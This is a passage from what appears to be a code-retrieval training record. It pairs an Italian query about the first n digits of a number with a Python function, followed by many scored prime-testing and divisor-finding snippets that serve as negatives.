x//2+1):\r\n if x%i==0:\r\n div+=(i,)\r\n return div", "def division(a, b):\n if b != 0:\n return a//b", "def es_primo(n):\n \n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def find_divisors_2(number):\n divisors = [n for n in range(1, number) if number % n == 0]\n return divisors", "def prime_factor(n):\n while n > 1:\n k = 2 \n while n % k != 0:\n k = k+1\n n = n // k\n print(k)", "def dividir(value, arg):\n return int(value) /int(arg)", "def harmonic(n, s=1):\n res = 0.0\n for i in xrange(1, n+1):\n res += 1 / (float(i) ** s)\n return res", "def count_factors(n):\n i, total= 1, 0\n while i <= n:\n if n % i == 0:\n total += 1\n i += 1\n return total" ]
[ "0.8429677", "0.7996387", "0.78186643", "0.7653951", "0.75979793", "0.75530833", "0.74734193", "0.7455468", "0.74018323", "0.73676103", "0.73581624", "0.7303397", "0.7295638", "0.72913414", "0.72630566", "0.72216606", "0.7220337", "0.721529", "0.71952325", "0.71851534", "0.7180473", "0.7176454", "0.7116876", "0.7095198", "0.7089094", "0.7088498", "0.70863765", "0.70626825", "0.7058414", "0.70432365", "0.70424974", "0.703794", "0.70353943", "0.7034338", "0.70323795", "0.70323795", "0.70255095", "0.700288", "0.6992965", "0.6959495", "0.69349885", "0.6920324", "0.6891601", "0.68870544", "0.6870524", "0.68704396", "0.6868298", "0.68323064", "0.68318576", "0.68308747", "0.6809437", "0.6801501", "0.6790294", "0.6760769", "0.6726948", "0.6715591", "0.67081684", "0.67081684", "0.6633245", "0.6610264", "0.6610264", "0.65757775", "0.65465283", "0.65117687", "0.65071476", "0.6499388", "0.6497775", "0.64940417", "0.6493268", "0.648213", "0.6440706", "0.64353853", "0.6435166", "0.64090115", "0.63780415", "0.63761425", "0.63643146", "0.63516486", "0.6339351", "0.6333005", "0.6312185", "0.6307855", "0.6298333", "0.6294619", "0.62763804", "0.627337", "0.6265573", "0.62635237", "0.62592536", "0.62559175", "0.625508", "0.62484866", "0.62427986", "0.6233572", "0.62224436", "0.62194026", "0.62191147", "0.621092", "0.619655", "0.61953044" ]
0.73575246
11
Prime n cifre del numero num
def first_n_digits(num, n): return num // 10 ** (int(math.log(num, 10)) - n + 1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def isprime(n):\r\n\treturn is_prime(n)", "def comprobar_primo(num):\n primo = True\n for i in range(2, num):\n if num%i == 0:\n primo = False\n return primo", "def isprime(n):\n\treturn is_prime(n)", "def get_prime_factor(n):\n if n % 2 == 0:\n return 2\n for num in range(3, n + 1, 2):\n if n % num == 0:\n return num", "def isprime(n=936):\n if n < 3: return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n return mr_prime(n)", "def nPrime(n):\n\n start = 1\n while n != 1:\n start += 2\n if isPrime(start):\n n -= 1\n # end of if\n\n return start", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 or n == 3:\n return True\n elif n % 2 == 0:\n return False\n else:\n x = 0\n for i in range(3, n, 2):\n if n % i == 0:\n x = 1\n return x == 0", "def is_prime(n):\n if n <= 1:\n return False\n elif n <= 2:\n return True\n elif n % 2 == 0:\n return False\n else:\n for i in range(3, int(n**.5) + 1, 2):\n if n % i == 0:\n return False\n return True", "def isPrime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n\n return True", "def isPrime(n):\n\n if n < 2:\n return False\n elif n in {2,3}:\n return True\n elif n % 2 == 0:\n return False\n else:\n for i in range(3,math.floor(math.sqrt(n))+1,2):\n if n % i == 0:\n return False\n else:\n return True", "def is_prime(n):\n k = 2\n while n % k != 0:\n k += 1\n if k < n:\n return False\n else:\n return True", "def isprime(n):\n if n == 2: return True\n if n == 3: return True\n if n % 2 == 0: return False\n if n % 3 == 0: return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def isprime(n):\n if n % 2 == 0:return False\n return all(n % i for i in range(3, int(n**0.5) + 1, 2))", "def coPrime(x):\n\n n = x * 2 + 100000 # Upper limit for range of random integers\n y = random.randint(x * 2, n)\n if (fractions.gcd(x, y) != 1):\n return coPrime(x)\n else:\n return y", "def if_prime(cls, n):\n\n if (n <= 1):\n return False\n if (n <= 3):\n return True\n\n if (n % 2 == 0 or n % 3 == 0):\n return False\n\n i = 5\n while(i * i <= n):\n if (n % i == 0 or n % (i + 2) == 0):\n return False\n i = i + 6\n\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if (n%2) == 0:\n return False\n for i in range(3,integer_sqrt(n)+1,2):\n if (n%i) == 0:\n return False\n return True", "def basicIsPrime(n,K=100):\n if n % 2 == 0:\n return n == 2\n if n in primesList.lessThanHundredThousand:\n return True\n return None", "def isPrime(n):\r\n if n == 2:\r\n return True\r\n if n == 3:\r\n return True\r\n if n % 2 == 0:\r\n return False\r\n if n % 3 == 0:\r\n return False\r\n\r\n i = 5\r\n w = 2\r\n\r\n while i * i <= n:\r\n if n % i == 0:\r\n return False\r\n\r\n i += w\r\n w = 6 - w\r\n\r\n return True", "def es_primo(n):\n \n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n\tprime = True\n\tif n == 1:\n\t\tprime = False\n\tc = 2\n\twhile c * c <= n:\n\t\tif n % c == 0:\n\t\t\tprime = False\n\t\tc += 1\n\treturn prime", "def isprime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def test_prime(n):\n if SIEVE[n]:\n return True\n else:\n return False", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i ** 2 <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n in [2,3]:\n return True\n if n % 2 == 0:\n return False\n\n for factor in range(3, int(math.sqrt(n))+1, 2):\n if n % factor == 0:\n return False\n return True", "def is_prime(n):\n if n < 1 or n % 1 > 0:\n return False\n if n == 1 or n == 2:\n return True\n for i in range(3, int(math.sqrt(n)) + 1):\n if n % i == 0:\n return False\n return True", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def isprime(n):\n if n == 1:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def is_prime(n):\n if n == 2:\n return True\n if n == 0 or n == 1 or n % 2 == 0:\n return False\n for i in range(3, int(math.sqrt(n))+1, 2):\n if n % i == 0:\n return False\n return True", "def isPrime(n):\r\n # Znamo da 1 nije prost broj\r\n if n == 1:\r\n return False\r\n\r\n i = 2\r\n # Petlja se vrti od 2 do int(sqrt(x)) \r\n while i*i <= n:\r\n # Provjera da li i dijeli x bez ostatka\r\n if n % i == 0:\r\n # To znači da n ima faktor između 2 i sqrt(n)\r\n # Stoga nije prost broj\r\n return False\r\n i += 1\r\n # Ako nismo pronašli nijedan faktor u gornjoj petlji\r\n # onda je n prost broj\r\n return True", "def next_prime(n):\n i = n + 1\n while not is_prime(i):\n i += 1\n return i", "def isPrime(n: int):\n if n <= 1:\n return False\n\n for i in range(2, n-1):\n if n % i == 0:\n # print(\"{} is divisable by {}\".format(n, i))\n return False\n\n return True", "def getNPrime(num):\n prime_numbers = []\n for i in range(num):\n if isPrime(i + 1):\n prime_numbers.append(i)\n return prime_numbers", "def is_prime(n):\n if n <= 1: return False\n if n <= 3: return True\n\n if (n % 2 == 0 or n % 3 == 0):\n return False\n\n i = 5\n while i * i <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True", "def is_prime(num):\n import math\n\n\n if num % 2 == 0 and num > 2:\n return False\n for i in range(3, int(math.sqrt(num))+1, 2):\n if num % i == 0:\n return False\n return True", "def is_prime(n):\n if n == 2:\n return True\n\n if n < 2 or n % 2 == 0:\n return False\n\n for i in range(3, int(sqrt(n)+1), 2):\n if n % i == 0:\n return False\n\n return True", "def is_prime(n):\n if n == 1:\n return False\n else:\n i = 2\n while i < n:\n if n % i == 0:\n return False\n i += 1\n return True", "def get_larger_prime(n):\n result = n + (1 if n % 2 == 0 else 2)\n while not is_prime(result):\n result += 2\n return result", "def prime_test(n,p):\n for i in range(2, p):\n thing = 1\n while thing == 1:\n if n % i == 0:\n n = n/i\n else:\n thing = 0\n if n == 1:\n return False\n return True", "def is_prime(num):\n\n assert num >= 0, \"Num should be a positive integer!\"\n\n if num < 2:\n return False\n\n if num == 2:\n return True\n\n if num % 2 == 0:\n return False\n\n n = 3\n while n * n <= num:\n if num % n == 0:\n return False\n n += 2\n\n return True", "def is_prime(n):\n for i in range(2,n):\n if n % i == 0:\n return False\n return True", "def primenumber(x):\n if x >= 2:\n for y in range(2,x):\n if not (x % y):\n return False\n else:\n return False\n return True", "def is_prime(n: int) -> bool:\n if n <= 3:\n return n > 1\n if n % 2 == 0 or n % 3 == 0:\n return False\n i = 5\n while i ** 2 <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True", "def is_prime(n):\n for k in range(2, (n // 2) + 1):\n if n % k == 0:\n return False\n \n return True", "def is_Prime(n):\n\n # make sure n is a positive integer\n n = abs(int(n))\n # 0 and 1 are not primes\n if n < 2:\n return False\n # 2 is the only even prime number\n if n == 2:\n return True\n # all other even numbers are not primes\n if not n & 1:\n return False\n # range starts with 3 and only needs to go up the squareroot of n\n # for all odd numbers\n for x in range(3, int(n ** 0.5) + 1, 2):\n if n % x == 0:\n return False\n return True", "def primfact(e):\n for n in range(2, e):\n for x in range(2, n):\n if n % x == 0:\n break\n else:\n print n,", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 | n == 3:\n return True\n if n % 2 == 0 | n % 3 == 0:\n return False\n for i in range(2, int(sqrt(n))+1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 | n == 3:\n return True\n if n % 2 == 0 | n % 3 == 0:\n return False\n for i in range(2, int(sqrt(n))+1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n if n <= 1:\n return False\n if n < 4:\n return True\n if n % 2 == 0:\n return False\n if n < 9:\n return True\n if n % 3 == 0:\n return False\n\n limit = int(math.floor(math.sqrt(n)))\n i = 5\n while i <= limit:\n if n % i == 0:\n return False\n if n % (i + 2) == 0:\n return False\n i += 6\n return True", "def isprime(n):\n # make sure n is a positive integer\n n = abs(int(n))\n # 0 and 1 are not primes\n if n < 2:\n return False\n # 2 is the only even prime number\n if n == 2:\n return True\n # all other even numbers are not primes\n if not n & 1:\n return False\n # range starts with 3 and only needs to go up the squareroot of n\n # for all odd numbers\n for x in range(3, int(int(n ** 0.5) ** 0.5) + 1, 2):\n if n % x == 0:\n return False\n return True", "def isprime(n):\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def low_prime(n):\n if n < 2 or n - round(n) != 0:\n print('Numbers smaller than 2 and non-integers do not have prime',\n 'factors')\n return None\n for i in range(2, int(sqrt(n) + 2)):\n if n % i == 0 and is_prime(i):\n return i\n return n", "def basic_is_prime(_n):\n if _n < 2:\n return False\n for p in [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,\n 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,\n 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317,\n 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443,\n 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577,\n 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701,\n 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839,\n 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983,\n 991, 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 1091, 1093,\n 1097, 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223,\n 1229, 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327,\n 1361, 1367, 1373, 1381, 1399, 1409, 1423, 1427, 1429, 1433, 1439, 1447, 1451, 1453, 1459, 1471, 1481,\n 1483, 1487, 1489, 1493, 1499, 1511, 1523, 1531, 1543, 1549, 1553, 1559, 1567, 1571, 1579, 1583, 1597,\n 1601, 1607, 1609, 1613, 1619, 1621, 1627, 1637, 1657, 1663, 1667, 1669, 1693, 1697, 1699, 1709, 1721,\n 1723, 1733, 1741, 1747, 1753, 1759, 1777, 1783, 1787, 1789, 1801, 1811, 1823, 1831, 1847, 1861, 1867,\n 1871, 1873, 1877, 1879, 1889, 1901, 1907, 1913, 1931, 1933, 1949, 1951, 1973, 1979, 1987, 1993, 1997,\n 1999, 2003, 2011, 2017, 2027, 2029, 2039, 2053, 2063, 2069, 2081, 2083, 2087, 2089, 2099, 2111, 2113,\n 2129, 2131, 2137, 2141, 2143, 2153, 2161, 2179, 2203, 2207, 2213, 2221, 2237, 2239, 2243, 2251, 2267,\n 2269, 2273, 2281, 2287, 2293, 2297, 2309, 2311, 2333, 2339, 2341, 2347, 2351, 2357, 2371, 2377, 2381,\n 2383, 2389, 2393, 2399, 2411, 2417, 2423, 2437, 2441, 2447, 2459, 2467, 2473, 2477, 2503, 2521, 2531,\n 2539, 2543, 2549, 2551, 2557, 2579, 2591, 2593, 2609, 2617, 2621, 2633, 2647, 2657, 2659, 2663, 2671,\n 2677, 2683, 2687, 2689, 2693, 2699, 2707, 2711, 2713, 2719, 2729, 2731, 2741, 2749, 2753, 2767, 2777,\n 2789, 2791, 2797, 2801, 2803, 2819, 2833, 2837, 2843, 2851, 2857, 2861, 2879, 2887, 2897, 2903, 2909,\n 2917, 2927, 2939, 2953, 2957, 2963, 2969, 2971, 2999, 3001, 3011, 3019, 3023, 3037, 3041, 3049, 3061,\n 3067, 3079, 3083, 3089, 3109, 3119, 3121, 3137, 3163, 3167, 3169, 3181, 3187, 3191, 3203, 3209, 3217,\n 3221, 3229, 3251, 3253, 3257, 3259, 3271, 3299, 3301, 3307, 3313, 3319, 3323, 3329, 3331, 3343, 3347,\n 3359, 3361, 3371, 3373, 3389, 3391, 3407, 3413, 3433, 3449, 3457, 3461, 3463, 3467, 3469, 3491, 3499,\n 3511, 3517, 3527, 3529, 3533, 3539, 3541, 3547, 3557, 3559, 3571, 3581, 3583, 3593, 3607, 3613, 3617,\n 3623, 3631, 3637, 3643, 3659, 3671, 3673, 3677, 3691, 3697, 3701, 3709, 3719, 3727, 3733, 3739, 3761,\n 3767, 3769, 3779, 3793, 3797, 3803, 3821, 3823, 3833, 3847, 3851, 3853, 3863, 3877, 3881, 3889, 3907,\n 3911, 3917, 3919, 3923, 3929, 3931, 3943, 3947, 3967, 3989, 4001, 4003, 4007, 4013, 4019, 4021, 4027,\n 4049, 4051, 4057, 4073, 4079, 4091, 4093, 4099, 4111, 4127, 4129, 4133, 4139, 4153, 4157, 4159, 4177,\n 4201, 4211, 4217, 4219, 4229, 4231, 4241, 4243, 4253, 4259, 4261, 4271, 4273, 4283, 4289, 4297, 4327,\n 4337, 4339, 4349, 4357, 4363, 4373, 4391, 4397, 4409, 4421, 4423, 4441, 4447, 4451, 4457, 4463, 4481,\n 4483, 4493, 4507, 4513, 4517, 4519, 4523, 4547, 4549, 4561, 4567, 4583, 4591, 4597, 4603, 4621, 4637,\n 4639, 4643, 4649, 4651, 4657, 4663, 4673, 4679, 4691, 4703, 4721, 4723, 4729, 4733, 4751, 4759, 4783,\n 4787, 4789, 4793, 4799, 4801, 4813, 4817, 4831, 4861, 4871, 4877, 4889, 4903, 4909, 4919, 4931, 4933,\n 4937, 4943, 4951, 4957, 4967, 4969, 4973, 4987, 4993, 4999, 5003, 5009, 5011, 5021, 5023, 5039, 5051,\n 5059, 5077, 5081, 5087, 5099, 5101, 5107, 5113, 5119, 5147, 5153, 5167, 5171, 5179, 5189, 5197, 5209,\n 5227, 5231, 5233, 5237, 5261, 5273, 5279, 5281, 5297, 5303, 5309, 5323, 5333, 5347, 5351, 5381, 5387,\n 5393, 5399, 5407, 5413, 5417, 5419, 5431, 5437, 5441, 5443, 5449, 5471, 5477, 5479, 5483, 5501, 5503,\n 5507, 5519, 5521, 5527, 5531, 5557, 5563, 5569, 5573, 5581, 5591, 5623, 5639, 5641, 5647, 5651, 5653,\n 5657, 5659, 5669, 5683, 5689, 5693, 5701, 5711, 5717, 5737, 5741, 5743, 5749, 5779, 5783, 5791, 5801,\n 5807, 5813, 5821, 5827, 5839, 5843, 5849, 5851, 5857, 5861, 5867, 5869, 5879, 5881, 5897, 5903, 5923,\n 5927, 5939, 5953, 5981, 5987, 6007, 6011, 6029, 6037, 6043, 6047, 6053, 6067, 6073, 6079, 6089, 6091,\n 6101, 6113, 6121, 6131, 6133, 6143, 6151, 6163, 6173, 6197, 6199, 6203, 6211, 6217, 6221, 6229, 6247,\n 6257, 6263, 6269, 6271, 6277, 6287, 6299, 6301, 6311, 6317, 6323, 6329, 6337, 6343, 6353, 6359, 6361,\n 6367, 6373, 6379, 6389, 6397, 6421, 6427, 6449, 6451, 6469, 6473, 6481, 6491, 6521, 6529, 6547, 6551,\n 6553, 6563, 6569, 6571, 6577, 6581, 6599, 6607, 6619, 6637, 6653, 6659, 6661, 6673, 6679, 6689, 6691,\n 6701, 6703, 6709, 6719, 6733, 6737, 6761, 6763, 6779, 6781, 6791, 6793, 6803, 6823, 6827, 6829, 6833,\n 6841, 6857, 6863, 6869, 6871, 6883, 6899, 6907, 6911, 6917, 6947, 6949, 6959, 6961, 6967, 6971, 6977,\n 6983, 6991, 6997, 7001, 7013, 7019, 7027, 7039, 7043, 7057, 7069, 7079, 7103, 7109, 7121, 7127, 7129,\n 7151, 7159, 7177, 7187, 7193, 7207, 7211, 7213, 7219, 7229, 7237, 7243, 7247, 7253, 7283, 7297, 7307,\n 7309, 7321, 7331, 7333, 7349, 7351, 7369, 7393, 7411, 7417, 7433, 7451, 7457, 7459, 7477, 7481, 7487,\n 7489, 7499, 7507, 7517, 7523, 7529, 7537, 7541, 7547, 7549, 7559, 7561, 7573, 7577, 7583, 7589, 7591,\n 7603, 7607, 7621, 7639, 7643, 7649, 7669, 7673, 7681, 7687, 7691, 7699, 7703, 7717, 7723, 7727, 7741,\n 7753, 7757, 7759, 7789, 7793, 7817, 7823, 7829, 7841, 7853, 7867, 7873, 7877, 7879, 7883, 7901, 7907,\n 7919, 7927, 7933, 7937, 7949, 7951, 7963, 7993, 8009, 8011, 8017, 8039, 8053, 8059, 8069, 8081, 8087,\n 8089, 8093, 8101, 8111, 8117, 8123, 8147, 8161, 8167, 8171, 8179, 8191, 8209, 8219, 8221, 8231, 8233,\n 8237, 8243, 8263, 8269, 8273, 8287, 8291, 8293, 8297, 8311, 8317, 8329, 8353, 8363, 8369, 8377, 8387,\n 8389, 8419, 8423, 8429, 8431, 8443, 8447, 8461, 8467, 8501, 8513, 8521, 8527, 8537, 8539, 8543, 8563,\n 8573, 8581, 8597, 8599, 8609, 8623, 8627, 8629, 8641, 8647, 8663, 8669, 8677, 8681, 8689, 8693, 8699,\n 8707, 8713, 8719, 8731, 8737, 8741, 8747, 8753, 8761, 8779, 8783, 8803, 8807, 8819, 8821, 8831, 8837,\n 8839, 8849, 8861, 8863, 8867, 8887, 8893, 8923, 8929, 8933, 8941, 8951, 8963, 8969, 8971, 8999, 9001,\n 9007, 9011, 9013, 9029, 9041, 9043, 9049, 9059, 9067, 9091, 9103, 9109, 9127, 9133, 9137, 9151, 9157,\n 9161, 9173, 9181, 9187, 9199, 9203, 9209, 9221, 9227, 9239, 9241, 9257, 9277, 9281, 9283, 9293, 9311,\n 9319, 9323, 9337, 9341, 9343, 9349, 9371, 9377, 9391, 9397, 9403, 9413, 9419, 9421, 9431, 9433, 9437,\n 9439, 9461, 9463, 9467, 9473, 9479, 9491, 9497, 9511, 9521, 9533, 9539, 9547, 9551, 9587, 9601, 9613,\n 9619, 9623, 9629, 9631, 9643, 9649, 9661, 9677, 9679, 9689, 9697, 9719, 9721, 9733, 9739, 9743, 9749,\n 9767, 9769, 9781, 9787, 9791, 9803, 9811, 9817, 9829, 9833, 9839, 9851, 9857, 9859, 9871, 9883, 9887,\n 9901, 9907, 9923, 9929, 9931, 9941, 9949, 9967, 9973]:\n if _n % p == 0:\n return _n == p\n if _n < 1E8: # Limit 1E8, because we have all primes below 1E4\n return True\n else:\n return None", "def is_prime(number):\n if number <=3:\n return True\n \n for i in range(2, number):\n if number % i == 0:\n return False\n \n return True", "def is_prime(n):\n assert n > 3\n k = int(log2(n))\n m = n - 1\n d = 0\n while(m % 2 == 0):\n m //= 2\n d += 1\n for _ in range(k):\n a = randint(2, n - 2)\n x = pow(a, m, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(d - 1):\n x = pow(x, 2, n)\n if x == 1:\n return 0\n if x == n - 1:\n break\n if x != n - 1:\n return 0\n return 1", "def is_prime(n):\n \n for i in range(3, int(n**0.5+1), 2):\n if n % i == 0:\n print(n,'is not prime')\n return False\n\n print(n,'is prime') \n return True", "def isPrime(n):\n for i in range (2, n/2+1):\n if n % i == 0:\n return False\n return True", "def _is_prime(self, num):\n if num == 2:\n return True\n if num < 2 or num % 2 == 0:\n return False\n for n in range(3, int(num ** 0.5) + 2, 2):\n if num % n == 0:\n return False\n return True", "def is_prime(n):\n\t\n\tif n < 2:\n\t\treturn False\n\t\n\tif not n % 2:\n\t\treturn False\n\t\n\tfor possible_factor in range(3, int(sqrt(n)) + 1, 2):\n\t\tif not n % possible_factor:\n\t\t\treturn False\n\treturn True", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n divisors[n] = n // 2\n return False\n if n % 3 == 0:\n divisors[n] = 3\n return False\n\n if n in primes:\n return primes[n]\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n divisors[n] = n // i\n primes[n] = False\n return False\n i += w\n w = 6 - w\n\n primes[n] = True\n return True", "def primes(n):\n sqrtN=n**0.5\n odds=[2]\n odds+=[i for i in range(3,n) if i%2>0]\n\n for i in odds:\n if i!=0 and i<=sqrtN:\n for j in odds[odds.index(i)+1:]:\n if j%i==0:\n odds[odds.index(j)]=0\n return [i for i in odds if i!=0]", "def prime_factor(n):\n while n > 1:\n k = 2 \n while n % k != 0:\n k = k+1\n n = n // k\n print(k)", "def is_prime(n):\n for k in range(2, (n // 2) + 1):\n if n % k == 0:\n return False\n\n return True", "def is_prime(n):\r\n if n in (2, 3, 5, 7, 11, 13, 17, 19): return(True)\r\n if (n<=1 or n%2==0 or n%3==0): return(False)\r\n # determine upper limit of test range =>\r\n ulimit = (int(math.ceil(math.sqrt(n)))+1)\r\n return(not any(n%k==0 for k in range(3, ulimit, 2)))", "def getPrime(bits):\n\twhile(True) :\n\t\t# on continue a tirer des nombres tant que l'on n'a pas trouve de nombre premier\n\t\tp = getrandbits(bits)\n\t\tif(miller_rabin(p,100)) :\n\t\t\treturn p", "def isPrime(n, primes):\n\n k = math.log(n, 2) # number of bits in n\n r = getRounds(k)\n\n return checks(n, primes, r) # run checks", "def is_prime(n):\n x = 2\n def divide_x(x):\n if x > round(pow(n, 0.5)):\n return True\n elif n % x == 0:\n return False\n else:\n return divide_x(x + 1)\n return divide_x(x)", "def is_prime(num):\n\n if num == 2:\n return True\n for i in range(2, num):\n if num % i == 0:\n return False\n return True", "def isPrime(n: int) -> bool:\n if n == 1:\n return False\n # handle boundary conditions\n if n == 2 or n == 3:\n return True\n # Now check for divisibility of n by 2 & 3\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n i = 5\n while (i * i <= n):\n if n % i == 0 or n % (i + 2) == 0:\n return False\n\n i = i + 6\n return True", "def is_prime(n):\n if n <= 1:\n return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n assert n >= 1, \"n is not a positive integer\"\n k = 2\n if n == 1:\n flag = False\n else:\n flag = True\n while k <= sqrt(n):\n if n % k == 0:\n flag = False\n break\n k += 1\n return flag", "def primi(n):\n numVec = []\n for x in range(n-1):\n numVec.append(x+2)\n for num in numVec[:(n//2-1)]:\n if numVec[num-2] != 0:\n numVec[slice(2*num-2, n-1, num)] = [0]*(n//num-1)\n numVec = [x for x in numVec if x!=0]\n return numVec", "def isPrime(num):\r\n if num < 1:\r\n return False\r\n elif num == 2:\r\n return True\r\n else:\r\n for i in range(2, num):\r\n if num % i == 0:\r\n return False\r\n return True", "def is_prime(n):\n if n < 2 or n - round(n) != 0:\n print('Numbers smaller than 2 and non-integers are never prime.')\n return False\n if n == 2:\n return True\n if n % 2 == 0:\n return False\n for i in range(3, int(sqrt(n)+2), 2):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n i, count = 2, 0\n while i < n:\n if n % i == 0:\n count += 1\n break\n i += 1\n if count == 0 and n != 1:\n return True\n else:\n return False", "def is_prime(number: int):\n\n for index in range(2, (number//2) + 1):\n if number%index == 0:\n return False\n return True", "def prime(n):\n # Case 0: n is 0, 1 or negative\n if n < 2:\n return False\n\n # Case 1: n = 2\n elif n == 2:\n return True\n\n # Case 2: n is even\n elif n % 2 == 0:\n return False\n\n # Case 3: n is odd\n for i in range(3, ceil(sqrt(n))+1, 2):\n if n % i == 0:\n return False\n\n return True", "def is_prime(num):\n\tif num is 1:\n\t\treturn False\n\tif num % 2 is 0:\n\t\treturn num is 2\n\n\tdivision = 3\n\twhile (division * division) <= num:\n\t\tif num % division is 0:\n\t\t\treturn False\n\t\tdivision += 2\n\treturn True", "def is_prime(num):\n for n in range(2, num):\n if num % n == 0:\n return False\n\n else:\n return True", "def equivalence(self, n):\n return n % self.prime", "def is_prime(number):\n number = int(number)\n\n if number < 2:\n return False\n if number < 4:\n return True\n if number % 2 == 0:\n return False\n for d in range(3, number // 2, 2):\n if number % d == 0:\n return False\n return True", "def isprime(n: int) -> bool:\r\n if n > 1:\r\n for i in range(2, int(n / 2) + 1):\r\n if (n % i) == 0:\r\n return False\r\n else:\r\n return True\r\n\r\n else:\r\n return False", "def is_prime(n: int) -> bool:\n if n <= 1:\n return False\n\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n \n if n < 2:\n return False\n elif n == 2 or n == 3 or n == 5:\n return True\n elif n % 2 == 0 or n % 3 == 0 or n % 5 == 0:\n return False\n \n i = 6\n sqrt_n = int(math.ceil(math.sqrt(n)))\n \n while i <= sqrt_n + 1:\n if n % (i - 1) == 0 or n % (i + 1) == 0:\n return False\n i += 6\n return True", "def prime(n):\n \n flag = 1 # this will be 0 --> if no prime \n for i in range(2, n):\n if (n%i == 0):\n flag = 0\n break #Most important to break once number is decided as not prime; even once divisible, no need to check further for that number \n else :\n flag = 1\n \n return flag", "def is_prime(num):\n if num < 2:\n return False\n\n for i in range(2, num):\n if num % i == 0:\n return True", "def is_prime(num):\n if num < 2:\n return False\n elif num == 2:\n return True\n\n for i in range(2, int(num**(1/2))+1):\n if num % i == 0:\n return False\n\n return True", "def isprime(n):\n\n if n % 2 == 0:\n return False\n\n # else take square root and iterate over all uneven (step 2) numbers\n sqrt_n = int(math.floor(math.sqrt(n)))\n for i in range(3, sqrt_n + 1, 2):\n if n % i == 0:\n return False\n\n return True", "def is_prime(n):\n if n == 2 or n == 3: return True\n if n < 2 or n % 2 == 0: return False\n if n < 9: return True\n if n % 3 == 0: return False\n r = int(sqrt(n))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f + 2) == 0: return False\n f += 6\n return True", "def is_prime(n):\n\n def mr(n, _known_primes=[2, 3], _precision_for_huge_n=16, ):\n\n def _try_composite(a, d, n, s):\n if pow(a, d, n) == 1:\n return False\n for i in range(s):\n if pow(a, 2**i * d, n) == n-1:\n return False\n return True # n is definitely composite\n\n if n in _known_primes:\n return True\n if n in (0, 1):\n return False\n if any((n % p) == 0 for p in _known_primes):\n return False\n d, s = n - 1, 0\n while not d % 2:\n d, s = d >> 1, s + 1\n\n # Returns exact according to http://primes.utm.edu/prove/prove2_3.html\n if n < 1373653:\n return not any(_try_composite(a, d, n, s) for a in (2, 3))\n if n < 25326001:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))\n if n < 118670087467:\n if n == 3215031751:\n return False\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))\n if n < 2152302898747:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))\n if n < 3474749660383:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))\n if n < 341550071728321:\n return not 